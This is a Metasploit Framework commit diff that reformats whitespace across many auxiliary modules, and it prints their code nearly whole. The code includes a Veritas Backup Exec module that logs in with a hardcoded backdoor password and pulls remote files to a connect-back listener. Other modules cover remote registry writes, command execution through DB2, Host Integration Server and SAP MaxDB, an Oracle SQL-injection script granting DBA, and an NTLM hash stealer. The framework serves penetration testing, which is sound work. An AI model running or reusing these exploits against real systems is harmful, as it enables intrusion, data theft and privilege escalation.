1
mirror of https://github.com/rapid7/metasploit-framework synced 2024-10-29 18:07:27 +01:00

big module whitespace/formatting cleanup pass

git-svn-id: file:///home/svn/framework3/trunk@9179 4d416f70-5f16-0410-b530-b9f4589650da
This commit is contained in:
Joshua Drake 2010-04-30 08:40:19 +00:00
parent 54725099d5
commit 0ea6eca4bc
676 changed files with 10698 additions and 10697 deletions

View File

@ -3,7 +3,7 @@
##
##
# This file is part of the Metasploit Framework and may be subject to
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
@ -18,13 +18,13 @@ class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::NDMP
def initialize(info = {})
super(update_info(info,
super(update_info(info,
'Name' => 'Veritas Backup Exec Windows Remote File Access',
'Description' => %q{
This module abuses a logic flaw in the Backup Exec Windows Agent to download
arbitrary files from the system. This flaw was found by someone who wishes to
remain anonymous and affects all known versions of the Backup Exec Windows Agent. The
output file is in 'MTF' format, which can be extracted by the 'NTKBUp' program
remain anonymous and affects all known versions of the Backup Exec Windows Agent. The
output file is in 'MTF' format, which can be extracted by the 'NTKBUp' program
listed in the references section. To transfer an entire directory, specify a
path that includes a trailing backslash.
},
@ -33,7 +33,7 @@ class Metasploit3 < Msf::Auxiliary
'Version' => '$Revision$',
'References' =>
[
['OSVDB', '18695'],
['OSVDB', '18695'],
['BID', '14551'],
['URL', 'http://www.fpns.net/willy/msbksrc.lzh'],
],
@ -43,44 +43,44 @@ class Metasploit3 < Msf::Auxiliary
],
'DefaultAction' => 'Download'
))
register_options(
[
Opt::RPORT(10000),
OptAddress.new('LHOST',
OptAddress.new('LHOST',
[
false,
"The local IP address to accept the data connection"
]
),
OptPort.new('LPORT',
OptPort.new('LPORT',
[
false,
"The local port to accept the data connection"
]
),
OptString.new('RPATH',
[
),
OptString.new('RPATH',
[
true,
"The remote filesystem path to download",
"The remote filesystem path to download",
"C:\\boot.ini"
]
),
OptString.new('LPATH',
[
OptString.new('LPATH',
[
true,
"The local filename to store the exported data",
"The local filename to store the exported data",
"backupexec_dump.mtf"
]
),
),
], self.class)
end
def run
print_status("Attempting to retrieve #{datastore['RPATH']}...")
lfd = File.open(datastore['LPATH'], 'w')
connect
data = ndmp_recv()
if (not data)
@ -91,7 +91,7 @@ class Metasploit3 < Msf::Auxiliary
username = "root"
password = "\xb4\xb8\x0f\x26\x20\x5c\x42\x34\x03\xfc\xae\xee\x8f\x91\x3d\x6f"
#
# Authenticate using the backdoor password
#
@ -107,7 +107,7 @@ class Metasploit3 < Msf::Auxiliary
username,
password
].pack('NNNNNNNNA*A*')
print_status("Sending magic authentication request...")
ndmp_send(auth)
data = ndmp_recv()
@ -115,7 +115,7 @@ class Metasploit3 < Msf::Auxiliary
print_error("Did not receive a response to our authentication request")
disconnect
return
end
end
#
@ -125,10 +125,10 @@ class Metasploit3 < Msf::Auxiliary
sfd = Rex::Socket.create_tcp_server(
'LocalPort' => datastore['LPORT']
)
local_addr = (datastore['LHOST'] || Rex::Socket.source_address(datastore['RHOST']))
local_port = sfd.getsockname[2]
#
# Create the DATA_CONNECT request
#
@ -143,7 +143,7 @@ class Metasploit3 < Msf::Auxiliary
Rex::Socket.gethostbyname(local_addr)[3],
local_port
].pack('NNNNNNNA4N')
print_status("Sending data connection request...")
ndmp_send(conn)
data = ndmp_recv()
@ -152,7 +152,7 @@ class Metasploit3 < Msf::Auxiliary
sfd.close
disconnect
return
end
end
#
# Wait for the agent to connect back
@ -160,8 +160,8 @@ class Metasploit3 < Msf::Auxiliary
print_status("Waiting for the data connection...")
rfd = sfd.accept()
sfd.close
#
# Create the Mover Set Record Size request
#
@ -174,7 +174,7 @@ class Metasploit3 < Msf::Auxiliary
0,
0x8000
].pack('NNNNNNN')
print_status("Sending transfer parameters...")
ndmp_send(msrs)
data = ndmp_recv()
@ -182,18 +182,18 @@ class Metasploit3 < Msf::Auxiliary
print_error("Did not receive a response to our parameters request")
disconnect
return
end
end
#
# Define our tranfer parameters
#
xenv =
xenv =
[
['USERNAME', ''],
['BU_EXCLUDE_ACTIVE_FILES', '0'],
['FILESYSTEM', "\"\\\\#{datastore['RHOST']}\\#{datastore['RPATH']}\",v0,t0,l0,n0,f0"]
]
#
# Create the DATA_START_BACKUP request
#
@ -208,26 +208,26 @@ class Metasploit3 < Msf::Auxiliary
].pack('NNNNNNN')
bkup += "dump"
bkup += [ xenv.length ].pack('N')
#
# Encode the transfer parameters
#
xenv.each do |e|
k,v = e
# Variable
bkup += [k.length].pack('N')
bkup += k
bkup += Rex::Encoder::NDR.align(k)
# Value
bkup += [v.length].pack('N')
bkup += v
bkup += Rex::Encoder::NDR.align(v)
bkup += Rex::Encoder::NDR.align(v)
end
bkup[-1, 1] = "\x01"
print_status("Sending backup request...")
ndmp_send(bkup)
data = ndmp_recv()
@ -236,7 +236,7 @@ class Metasploit3 < Msf::Auxiliary
disconnect
return
end
#
# Create the GET_ENV request
#
@ -246,7 +246,7 @@ class Metasploit3 < Msf::Auxiliary
0,
0x4004,
0,
0
0
].pack('NNNNNN')
print_status("Sending environment request...")
@ -256,14 +256,14 @@ class Metasploit3 < Msf::Auxiliary
print_error("Did not receive a response to our environment request")
disconnect
return
end
#
end
#
# Start transferring data
#
print_status("Transferring data...")
bcnt = 0
begin
while (data = rfd.get_once)
bcnt += data.length
@ -271,13 +271,13 @@ class Metasploit3 < Msf::Auxiliary
end
rescue ::EOFError
end
lfd.close
rfd.close
print_status("Transferred #{bcnt} bytes.")
disconnect
end
end

View File

@ -3,7 +3,7 @@
##
##
# This file is part of the Metasploit Framework and may be subject to
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
@ -19,14 +19,14 @@ class Metasploit3 < Msf::Auxiliary
include ::Rex::Platforms::Windows
def initialize(info = {})
super(update_info(info,
super(update_info(info,
'Name' => 'Veritas Backup Exec Server Registry Access',
'Description' => %q{
This modules exploits a remote registry access flaw in the BackupExec Windows
Server RPC service. This vulnerability was discovered by Pedram Amini and is based
on the NDR stub information information posted to openrce.org.
on the NDR stub information information posted to openrce.org.
Please see the action list for the different attack modes.
},
'Author' => [ 'hdm' ],
'License' => MSF_LICENSE,
@ -42,16 +42,16 @@ class Metasploit3 < Msf::Auxiliary
['System Information'],
['Create Logon Notice']
],
'DefaultAction' => 'System Information'
'DefaultAction' => 'System Information'
))
register_options(
[
Opt::RPORT(6106),
OptString.new('WARN',
[
OptString.new('WARN',
[
false,
"The warning to display for the Logon Notice action",
"The warning to display for the Logon Notice action",
"Compromised by Metasploit!\r\n"
]
),
@ -59,7 +59,7 @@ class Metasploit3 < Msf::Auxiliary
end
def auxiliary_commands
return {
return {
"regread" => "Read a registry value",
# "regenum" => "Enumerate registry keys",
}
@ -73,15 +73,15 @@ class Metasploit3 < Msf::Auxiliary
logon_notice()
end
end
def cmd_regread(*args)
if (args.length == 0)
print_status("Usage: regread HKLM\\\\Hardware\\\\Description\\\\System\\\\SystemBIOSVersion")
return
end
paths = args[0].split("\\")
hive = paths.shift
subval = paths.pop
@ -97,12 +97,12 @@ class Metasploit3 < Msf::Auxiliary
end
def cmd_regenum(*args)
if (args.length == 0)
print_status("Usage: regenum HKLM\\\\Software")
return
end
paths = args[0].split("\\")
hive = paths.shift
subkey = "\\" + paths.join("\\")
@ -115,10 +115,10 @@ class Metasploit3 < Msf::Auxiliary
end
end
def system_info
print_status("Dumping system information...")
prod_id = backupexec_regread('HKLM', 'Software\\Microsoft\\Windows\\CurrentVersion', 'ProductId') || 'Unknown'
prod_name = backupexec_regread('HKLM', 'Software\\Microsoft\\Windows NT\\CurrentVersion', 'ProductName') || 'Windows (Unknown)'
prod_sp = backupexec_regread('HKLM', 'Software\\Microsoft\\Windows NT\\CurrentVersion', 'CSDVersion') || 'No Service Pack'
@ -132,14 +132,14 @@ class Metasploit3 < Msf::Auxiliary
print_status("The system is registered to #{deunicode(owner)} of #{deunicode(company)}")
print_status("The system runs on a #{deunicode(cpu)}")
end
def logon_notice
print_status("Setting the logon warning to #{datastore['WARN'].strip}...")
backupexec_regwrite('HKLM', 'Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon', 'LegalNoticeText', REG_SZ, datastore['WARN'])
backupexec_regwrite('HKLM', 'Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon', 'LegalNoticeCaption', REG_SZ, 'METASPLOIT')
end
def deunicode(str)
str.gsub(/\x00/, '').strip
end
@ -149,9 +149,9 @@ class Metasploit3 < Msf::Auxiliary
#
def backupexec_regwrite(hive, subkey, subval, type, data)
stub = backupexec_regrpc_write(
:hive => registry_hive_lookup(hive),
:subkey => subkey,
:subval => subval,
:hive => registry_hive_lookup(hive),
:subkey => subkey,
:subval => subval,
:type => type,
:data => data
)
@ -159,15 +159,15 @@ class Metasploit3 < Msf::Auxiliary
return false if resp.length == 0
return true
end
#
# Read a registry key
#
def backupexec_regread(hive, subkey, subval, type = REG_SZ)
stub = backupexec_regrpc_read(
:hive => registry_hive_lookup(hive),
:subkey => subkey,
:subval => subval,
:hive => registry_hive_lookup(hive),
:subkey => subkey,
:subval => subval,
:type => type
)
resp = backupexec_regrpc_call(4, stub)
@ -184,40 +184,40 @@ class Metasploit3 < Msf::Auxiliary
#
def backupexec_regenum(hive, subkey)
stub = backupexec_regrpc_enum(
:hive => registry_hive_lookup(hive),
:hive => registry_hive_lookup(hive),
:subkey => subkey
)
resp = backupexec_regrpc_call(7, stub)
p resp
return nil if resp.length == 0
ret, len = resp[0,8].unpack('VV')
return nil if ret == 0
return nil if len == 0
return resp[8, len]
end
#
# Call the backupexec registry service
#
#
def backupexec_regrpc_call(opnum, data = '')
handle = dcerpc_handle(
'93841fd0-16ce-11ce-850d-02608c44967b', '1.0',
'ncacn_ip_tcp', [datastore['RPORT']]
)
dcerpc_bind(handle)
resp = dcerpc.call(opnum, data)
outp = ''
if (dcerpc.last_response and dcerpc.last_response.stub_data)
outp = dcerpc.last_response.stub_data
end
disconnect
outp
end
@ -261,11 +261,11 @@ class Metasploit3 < Msf::Auxiliary
hive = opts[:hive] || HKEY_LOCAL_MACHINE
type = opts[:type] || REG_SZ
data = opts[:data] || ''
if (type == REG_SZ || type == REG_EXPAND_SZ)
if (type == REG_SZ || type == REG_EXPAND_SZ)
data = Rex::Text.to_unicode(data+"\x00")
end
stub =
NDR.UnicodeConformantVaryingString(subkey) +
NDR.UnicodeConformantVaryingString(subval) +
@ -279,5 +279,5 @@ class Metasploit3 < Msf::Auxiliary
NDR.long(hive)
return stub
end
end

View File

@ -3,7 +3,7 @@
##
##
# This file is part of the Metasploit Framework and may be subject to
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
@ -18,7 +18,7 @@ class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::Tcp
def initialize(info = {})
super(update_info(info,
super(update_info(info,
'Name' => 'Cisco VPN Concentrator 3000 FTP Unauthorized Administrative Access',
'Description' => %q{
This module tests for a logic vulnerability in the Cisco VPN Concentrator

View File

@ -1,5 +1,9 @@
##
# This file is part of the Metasploit Framework and may be subject to
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
@ -12,7 +16,7 @@ class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::SMB
def initialize(info = {})
super(update_info(info,
super(update_info(info,
'Name' => 'IBM DB2 db2rcmd.exe Command Execution Vulnerability.',
'Description' => %q{
This module exploits a vulnerability in the Remote Command Server
@ -31,12 +35,12 @@ class Metasploit3 < Msf::Auxiliary
],
'DisclosureDate' => 'Mar 4 2004'))
register_options(
register_options(
[
OptString.new('CMD', [ true, 'The command to execute', 'ver']),
OptString.new('SMBUser', [ true, 'The username to authenticate as', 'db2admin']),
OptString.new('SMBPass', [ true, 'The password for the specified username', 'db2admin'])
], self.class )
], self.class )
end
def run
@ -46,7 +50,7 @@ class Metasploit3 < Msf::Auxiliary
print_status("Authenticating as user '#{datastore['SMBUser']}' with pass '#{datastore['SMBPass']}'...")
# Connect with a valid user/pass. if not, then bail.
# Connect with a valid user/pass. if not, then bail.
begin
smb_login()
rescue ::Exception => e
@ -54,8 +58,8 @@ class Metasploit3 < Msf::Auxiliary
disconnect
return
end
# Have it so our command arg is convenient to call.
# Have it so our command arg is convenient to call.
rcmd = datastore['CMD']
print_status("Connecting to named pipe \\DB2REMOTECMD...")
@ -84,10 +88,10 @@ class Metasploit3 < Msf::Auxiliary
# Read from the pipe and give us the data.
res = pipe.read()
puts res
# Close the named pipe and disconnect from the socket.
pipe.close
pipe.close
disconnect
end
end

View File

@ -1,3 +1,7 @@
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
@ -31,7 +35,7 @@ class Metasploit3 < Msf::Auxiliary
],
'DisclosureDate' => 'May 27 2008'))
register_options(
register_options(
[
Opt::RPORT(3000),
OptString.new('CMD', [ false, 'The OS command to execute', 'hostname']),
@ -43,17 +47,17 @@ class Metasploit3 < Msf::Auxiliary
data = "\x75" + datastore['CMD']
pad = "\x00" * 512
pkt = data + pad
print_status("Sending command: #{datastore['CMD']}")
pkt = data + pad
print_status("Sending command: #{datastore['CMD']}")
sock.put(pkt)
# try to suck it all in.
sleep(5)
res = sock.get_once
res.each do |info|
puts "[*] #{info.gsub(/[^[:print:]]+/,"")}" # hack.
end

View File

@ -1,3 +1,7 @@
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
@ -31,7 +35,7 @@ class Metasploit3 < Msf::Auxiliary
],
'DisclosureDate' => 'May 27 2008'))
register_options(
register_options(
[
Opt::RPORT(3500),
OptString.new('CMD', [ false, 'The OS command to execute', 'echo metasploit > metasploit.txt']),
@ -43,17 +47,17 @@ class Metasploit3 < Msf::Auxiliary
data = "\x75" + datastore['CMD']
pad = "\x00" * 512
pkt = data + pad
pkt = data + pad
# commands are executed blindly.
print_status("Sending command: #{datastore['CMD']}")
print_status("Sending command: #{datastore['CMD']}")
sock.put(pkt)
sleep(1)
sock.get_once
print_status("Executed '#{datastore['CMD']}'...")
disconnect

View File

@ -3,7 +3,7 @@
##
##
# This file is part of the Metasploit Framework and may be subject to
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
@ -18,7 +18,7 @@ class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
super(update_info(info,
'Name' => 'HP Web JetAdmin 6.5 Server Arbitrary Command Execution',
'Description' => %q{
This module abuses a command execution vulnerability within the
@ -39,7 +39,7 @@ class Metasploit3 < Msf::Auxiliary
[ 'URL', 'http://www.milw0rm.com/exploits/294' ],
],
'DisclosureDate' => 'Apr 27 2004'))
register_options(
[
Opt::RPORT(8000),

View File

@ -3,7 +3,7 @@
##
##
# This file is part of the Metasploit Framework and may be subject to
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/

View File

@ -1,3 +1,7 @@
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
@ -18,7 +22,7 @@ class Metasploit3 < Msf::Auxiliary
This module exploits a file disclosure vulnerability in the jumpUrl mechanism of
Typo3. This flaw can be used to read any file that the web server user account has
access to.
},
'Author' => [ 'spinbad <spinbad.security[at]googlemail.com>' ],
'License' => MSF_LICENSE,
@ -52,7 +56,7 @@ class Metasploit3 < Msf::Auxiliary
error_uri = datastore['URI'] + "/index.php?jumpurl=" +datastore['RFILE'] +"&juSecure=1&type=0&locationData=1:"
ju_hash = nil
res = send_request_raw({
'uri' => error_uri,
'method' => 'GET',
@ -65,24 +69,24 @@ class Metasploit3 < Msf::Auxiliary
if (res and res.message == "OK")
res.body =~ /jumpurl Secure: Calculated juHash, ((\w)+), did not match the submitted juHash./
if $1.nil?
print_error("Error while getting juHash. Maybe the version is already patched...")
return
end
ju_hash = $1
print_status("Getting juHash from error message: #{ju_hash}")
else
print_error("No response from the server.")
return
end
file_uri = datastore['URI'] + "/index.php?jumpurl=" +datastore['RFILE'] +"&juSecure=1&type=0&juHash=#{ju_hash}&locationData=1:"
print_status("Trying to get #{datastore['RFILE']}.")
print_status("Trying to get #{datastore['RFILE']}.")
file = send_request_raw({
'uri' => file_uri,
'method' => 'GET',
@ -92,15 +96,15 @@ class Metasploit3 < Msf::Auxiliary
'Connection' => 'Close',
}
},25)
if (file and file.message = "OK")
if file.body == 'jumpurl Secure: "' + datastore['RFILE'] + '" was not a valid file!'
print_error("File #{datastore['RFILE']} does not exist.")
return
end
print_status("Writing local file #{datastore['LFILE']}.")
open(datastore['LFILE'],'w') {|f| f << file.body }
open(datastore['LFILE'],'w') {|f| f << file.body }
else
print_error("Error while getting file.")
end

View File

@ -34,7 +34,7 @@ class Metasploit3 < Msf::Auxiliary
],
'DisclosureDate' => 'Jan 9 2008'))
register_options(
register_options(
[
Opt::RPORT(7210),
OptString.new('CMD', [ false, 'The OS command to execute', 'hostname']),
@ -59,7 +59,7 @@ class Metasploit3 < Msf::Auxiliary
sock.put(pdbmsrv)
sock.get_once
sock.put(db_version)
ver = sock.get_once
info = ver[27,2000]
@ -69,10 +69,10 @@ class Metasploit3 < Msf::Auxiliary
#Send our command.
len = 39 + datastore['CMD'].length
data = len.chr + "\x00\x00\x00\x03\x3F\x00\x00\x01\x00\x00\x00\x54\x0D\x00\x00"
data << "\x00\x00\x04\x00" + len.chr + "\x00\x00\x00\x65\x78\x65\x63\x5F\x73\x64"
data << "\x62\x69\x6E\x66\x6F\x20\x26\x26" + "#{datastore['CMD']}"
data << "\x62\x69\x6E\x66\x6F\x20\x26\x26" + "#{datastore['CMD']}"
sock.put(data)

View File

@ -1,5 +1,9 @@
##
# This file is part of the Metasploit Framework and may be subject to
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
@ -12,7 +16,7 @@ class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::DCERPC
def initialize(info = {})
super(update_info(info,
super(update_info(info,
'Name' => 'Microsoft Host Integration Server 2006 Command Execution Vulnerability.',
'Description' => %q{
This module exploits a command-injection vulnerability in Microsoft Host Integration Server 2006.
@ -33,12 +37,12 @@ class Metasploit3 < Msf::Auxiliary
],
'DisclosureDate' => 'Oct 14 2008'))
register_options(
[
register_options(
[
Opt::RPORT(0),
OptString.new('COMMAND', [ true, 'The command to execute', 'cmd.exe']),
OptString.new('ARGS', [ true, 'The arguments to the command', '/c echo metasploit > metasploit.txt'])
], self.class )
OptString.new('ARGS', [ true, 'The arguments to the command', '/c echo metasploit > metasploit.txt'])
], self.class )
end
def run
@ -53,7 +57,7 @@ class Metasploit3 < Msf::Auxiliary
if (dport == 0)
dport = dcerpc_endpoint_find_tcp(datastore['RHOST'], 'ed6ee250-e0d1-11cf-925a-00aa00c006c1', '1.0', 'ncacn_ip_tcp')
dport ||= dcerpc_endpoint_find_tcp(datastore['RHOST'], 'ed6ee250-e0d1-11cf-925a-00aa00c006c1', '1.1', 'ncacn_ip_tcp')
dport ||= dcerpc_endpoint_find_tcp(datastore['RHOST'], 'ed6ee250-e0d1-11cf-925a-00aa00c006c1', '1.1', 'ncacn_ip_tcp')
if (not dport)
print_status("Could not determine the RPC port used by the Service.")
@ -72,7 +76,7 @@ class Metasploit3 < Msf::Auxiliary
print_status("Bound to #{handle} ...")
cmd = NDR.string("#{datastore['COMMAND']}") + NDR.string("#{datastore['ARGS']}")
print_status("Sending command: #{datastore['COMMAND']} #{datastore['ARGS']}")
begin
@ -81,7 +85,7 @@ class Metasploit3 < Msf::Auxiliary
end
disconnect
end
end
=begin

View File

@ -1,3 +1,6 @@
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
@ -13,7 +16,7 @@ class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::MSSQL
include Msf::Auxiliary::Report
def initialize(info = {})
super(update_info(info,
'Name' => 'Microsoft SQL Server Configuration Enumerator',
@ -31,7 +34,7 @@ class Metasploit3 < Msf::Auxiliary
def run
print_status("Running MS SQL Server Enumeration...")
if mssql_login_datastore
#Get Version
print_status("Version:")
@ -42,7 +45,7 @@ class Metasploit3 < Msf::Auxiliary
print "[*]\t#{row}"
end
vernum = sqlversion.gsub("\n"," ").scan(/SQL Server\s*(200\d)/m)
report_note(:host => datastore['RHOST'],
report_note(:host => datastore['RHOST'],
:proto => 'TCP',
:port => datastore['RPORT'],
:type => 'MSSQL_ENUM',
@ -72,14 +75,14 @@ class Metasploit3 < Msf::Auxiliary
#checking for C2 Audit Mode
if sysconfig['c2 audit mode'] == 1
print_status("\tC2 Audit Mode is Enabled")
report_note(:host => datastore['RHOST'],
report_note(:host => datastore['RHOST'],
:proto => 'TCP',
:port => datastore['RPORT'],
:type => 'MSSQL_ENUM',
:data => "C2 Audit Mode is Enabled")
else
print_status("\tC2 Audit Mode is Not Enabled")
report_note(:host => datastore['RHOST'],
report_note(:host => datastore['RHOST'],
:proto => 'TCP',
:port => datastore['RPORT'],
:type => 'MSSQL_ENUM',
@ -125,14 +128,14 @@ class Metasploit3 < Msf::Auxiliary
#check if remote access is enabled
if sysconfig['remote access'] == 1
print_status("\tremote access is Enabled")
report_note(:host => datastore['RHOST'],
report_note(:host => datastore['RHOST'],
:proto => 'TCP',
:port => datastore['RPORT'],
:type => 'MSSQL_ENUM',
:data => "remote access is Enabled")
else
print_status("\tremote access is Not Enabled")
report_note(:host => datastore['RHOST'],
report_note(:host => datastore['RHOST'],
:proto => 'TCP',
:port => datastore['RPORT'],
:type => 'MSSQL_ENUM',
@ -142,14 +145,14 @@ class Metasploit3 < Msf::Auxiliary
#check if updates are allowed
if sysconfig['allow updates'] == 1
print_status("\tallow updates is Enabled")
report_note(:host => datastore['RHOST'],
report_note(:host => datastore['RHOST'],
:proto => 'TCP',
:port => datastore['RPORT'],
:type => 'MSSQL_ENUM',
:data => "allow updates is Enabled")
else
print_status("\tallow updates is Not Enabled")
report_note(:host => datastore['RHOST'],
report_note(:host => datastore['RHOST'],
:proto => 'TCP',
:port => datastore['RPORT'],
:type => 'MSSQL_ENUM',
@ -267,7 +270,7 @@ class Metasploit3 < Msf::Auxiliary
if syslogins != nil
syslogins.each do |acc|
print_status("\t#{acc.join}")
report_note(:host => datastore['RHOST'],
report_note(:host => datastore['RHOST'],
:proto => 'TCP',
:port => datastore['RPORT'],
:type => 'MSSQL_ENUM',
@ -438,7 +441,7 @@ class Metasploit3 < Msf::Auxiliary
if sameasuser != nil
sameasuser.each do |up|
print_status("\t#{up.join}")
report_note(:host => datastore['RHOST'],
report_note(:host => datastore['RHOST'],
:proto => 'TCP',
:port => datastore['RPORT'],
:type => 'MSSQL_ENUM',
@ -464,7 +467,7 @@ class Metasploit3 < Msf::Auxiliary
if blankpass != nil
blankpass.each do |up|
print_status("\t#{up.join}")
report_note(:host => datastore['RHOST'],
report_note(:host => datastore['RHOST'],
:proto => 'TCP',
:port => datastore['RPORT'],
:type => 'MSSQL_ENUM',
@ -686,7 +689,7 @@ class Metasploit3 < Msf::Auxiliary
fountsp.each do |strp|
if dangeroussp.include?(strp.strip)
print_status("\t#{strp.strip}")
report_note(:host => datastore['RHOST'],
report_note(:host => datastore['RHOST'],
:proto => 'TCP',
:port => datastore['RPORT'],
:type => 'MSSQL_ENUM',
@ -714,7 +717,7 @@ class Metasploit3 < Msf::Auxiliary
mssql_query(querykey)[:rows].each do |i|
instances << i[1]
end
end
end
print_status("Instances found on this server:")
instancenames = []
if instances != nil

View File

@ -15,7 +15,7 @@ require 'msf/core'
class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::MSSQL
def initialize(info = {})
super(update_info(info,
'Name' => 'Microsoft SQL Server Generic Query',
@ -33,12 +33,12 @@ class Metasploit3 < Msf::Auxiliary
]
))
register_options(
register_options(
[
OptString.new('SQL', [ false, 'The SQL query to execute', 'select @@version']),
], self.class)
end
def run
mssql_query(datastore['SQL'], true) if mssql_login_datastore
disconnect

View File

@ -3,7 +3,7 @@
##
##
# This file is part of the Metasploit Framework and may be subject to
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
@ -14,7 +14,7 @@ require 'msf/core'
class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
include Msf::Auxiliary::Scanner

View File

@ -36,13 +36,13 @@ class Metasploit3 < Msf::Auxiliary
],
'DisclosureDate' => 'Jan 13 2009'))
register_options(
register_options(
[
OptString.new('SQL', [ false, 'The SQL to execute.', 'GRANT DBA TO SCOTT']),
OptString.new('USER', [ false, 'The current user. ', 'SCOTT']),
OptString.new('FILENAME', [ false, 'The file name.', 'msf.sql']),
OptString.new('OUTPUTPATH', [ false, 'The location of the file.', './data/exploits/']),
], self.class)
end
@ -58,8 +58,8 @@ class Metasploit3 < Msf::Auxiliary
function1 = %Q|
CREATE OR REPLACE PROCEDURE #{name1}
AUTHID CURRENT_USER AS
PRAGMA AUTONOMOUS_TRANSACTION;
BEGIN EXECUTE IMMEDIATE '#{datastore['SQL']}';
PRAGMA AUTONOMOUS_TRANSACTION;
BEGIN EXECUTE IMMEDIATE '#{datastore['SQL']}';
END;
|
@ -78,17 +78,17 @@ class Metasploit3 < Msf::Auxiliary
|
prepare ="create table \"O' and 1=#{datastore['USER']}.#{name2}--\"(id number)"
exploiting1 ="drop table \"O' and 1=#{datastore['USER']}.#{name2}--\""
exploiting2 = "insert into system.DEF$_TEMP$LOB (TEMP$BLOB) VALUES ('AA')"
fun1 = Rex::Text.encode_base64(function1)
fun2 = Rex::Text.encode_base64(function2)
prp = Rex::Text.encode_base64(prepare)
exp1 = Rex::Text.encode_base64(exploiting1)
exp2 = Rex::Text.encode_base64(exploiting2)
sql = %Q|
DECLARE
@ -117,10 +117,10 @@ class Metasploit3 < Msf::Auxiliary
|
print_status("Creating '#{datastore['FILENAME']}' file ...")
print_status("Creating '#{datastore['FILENAME']}' file ...")
file_create(sql)
end
end
end

View File

@ -1,3 +1,7 @@
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
@ -20,7 +24,7 @@ class Metasploit3 < Msf::Auxiliary
To do this you must firstly run smb_sniffer or smb_relay module on your sever.
Then you must connect to Oracle database and run this module Ora_NTLM_stealer.rb
which will connect to your SMB sever with credentials of Oracle RDBMS.
So if smb_relay is working, you will get Administrator access to server which
So if smb_relay is working, you will get Administrator access to server which
runs Oracle. If not than you can decrypt HALFLM hash.
},
'Author' => [ 'Sh2kerr <research[ad]dsecrg.com>' ],
@ -32,9 +36,9 @@ class Metasploit3 < Msf::Auxiliary
],
'DisclosureDate' => 'Apr 7 2009'))
register_options(
register_options(
[
OptString.new('IP', [ false, 'IP adress of SMB proxy.', '0.0.0.0' ]),
OptString.new('IP', [ false, 'IP adress of SMB proxy.', '0.0.0.0' ]),
], self.class)
end

View File

@ -1,3 +1,7 @@
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
@ -18,7 +22,7 @@ class Metasploit3 < Msf::Auxiliary
'Name' => 'Oracle Account Discovery.',
'Description' => %q{
This module uses a list of well known default authentication credentials
to discover easily guessed accounts.
to discover easily guessed accounts.
},
'Author' => [ 'MC' ],
'License' => MSF_LICENSE,

View File

@ -1,3 +1,7 @@
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
@ -10,7 +14,7 @@ require 'msf/core'
class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::ORACLE
def initialize(info = {})
super(update_info(info,
'Name' => 'Oracle SQL Generic Query',
@ -28,7 +32,7 @@ class Metasploit3 < Msf::Auxiliary
],
'DisclosureDate' => 'Dec 7 2007'))
register_options(
register_options(
[
OptString.new('SQL', [ false, 'The SQL to execute.', 'select * from v$version']),
], self.class)
@ -49,7 +53,7 @@ class Metasploit3 < Msf::Auxiliary
end
end
rescue => e
return
return
end
end

View File

@ -1,3 +1,7 @@
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
@ -11,7 +15,7 @@ class Metasploit3 < Msf::Auxiliary
include Msf::Auxiliary::Report
include Msf::Exploit::ORACLE
def initialize(info = {})
super(update_info(info,
'Name' => 'Oracle Database Enumeration',
@ -43,7 +47,7 @@ class Metasploit3 < Msf::Auxiliary
end
print_status("Running Oracle Enumeration....")
#Version Check
query = 'select * from v$version'
ver = prepare_exec(query)
@ -52,7 +56,7 @@ class Metasploit3 < Msf::Auxiliary
print_status("\t#{v.chomp}")
report_note(:host => datastore['RHOST'], :proto => 'TNS', :port => datastore['RPORT'], :type => 'ORA_ENUM', :data => "Component Version: #{v.chomp}")
end
#Saving Major Release Number for other checks
majorrel = ver[0].scan(/Edition Release (\d*)./)
@ -77,7 +81,7 @@ class Metasploit3 < Msf::Auxiliary
end
end
#-------------------------------------------------------
#Security Settings
print_status("Security Settings:")
